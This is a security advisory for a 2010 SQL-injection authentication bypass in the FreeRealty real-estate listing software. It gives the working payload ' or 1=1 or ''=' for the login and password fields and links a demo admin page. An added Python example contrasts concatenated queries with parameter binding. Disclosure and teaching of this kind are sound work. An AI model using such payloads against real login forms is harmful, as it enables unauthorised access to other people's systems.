FreeRealty remote SQL injection

2010-04-28 / 2010-04-29
Credit: Sid3^effects
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Authentication bypass in FreeRealty(Free Real Estate Listing Software)
# Date: 27-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : []
______________________________________________________________________________
Authentication bypass in FreeRealty
Vendor:http://freerealty.rwcinc.net/
___________________________Author:Sid3^effects_________________________________

Description :
Free Realty is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end user does not need to be fluent in web page design.
script cost :Free
---------------------------------------------------------------------------
* Authentication bypass:
The following script has authentication bypass.
use ' or 1=1 or ''=' in both login and password.
DEMO :http://freerealty.rwcinc.net/demo/agentadmin.php

ShoutZ :
-------
---Indian Cyber warriors--Andhra hackers--
Greetz :
--------
---*L0rd rusAdêr*---d4rk-blu® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--
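Why the string quoted in the advisory passes a login check, and how parameter binding closes it, as an added example that is not part of the original advisory or FreeRealty's code. The `agents` table, its columns, the query shape and the sample credentials are assumptions made for illustration; SQLite stands in for the application's database.

```python
import sqlite3

# The input quoted in the advisory, used for both fields.
ADVISORY_INPUT = "' or 1=1 or ''='"


def make_db():
    """Constructed sample data; schema and names are assumed, not FreeRealty's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE agents (login TEXT, password TEXT)")
    db.execute("INSERT INTO agents VALUES ('agent1', 'correct-horse')")
    return db


def render_concat(login, password):
    """Build the statement the way a concatenating login handler would."""
    return ("SELECT login FROM agents WHERE login = '" + login +
            "' AND password = '" + password + "'")


def login_concat(db, login, password):
    """Vulnerable pattern (CWE-89): input becomes part of the SQL text."""
    return db.execute(render_concat(login, password)).fetchone() is not None


def login_bound(db, login, password):
    """Hardened pattern: input is bound as data and never parsed as SQL."""
    sql = "SELECT login FROM agents WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # The quotes in the input close the string literals, so the WHERE clause
    # gains "or 1=1" terms and is true for every row.
    print(render_concat(ADVISORY_INPUT, ADVISORY_INPUT))
    print("concatenated:", login_concat(db, ADVISORY_INPUT, ADVISORY_INPUT))
    # Bound parameters compare the whole input against the stored values.
    print("bound:       ", login_bound(db, ADVISORY_INPUT, ADVISORY_INPUT))
    print("valid login: ", login_bound(db, "agent1", "correct-horse"))
```
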

References:

http://xforce.iss.net/xforce/xfdb/58193
http://www.securityfocus.com/bid/39712
http://www.exploit-db.com/exploits/12411
http://packetstormsecurity.org/1004-exploits/freerealty-sql.txt

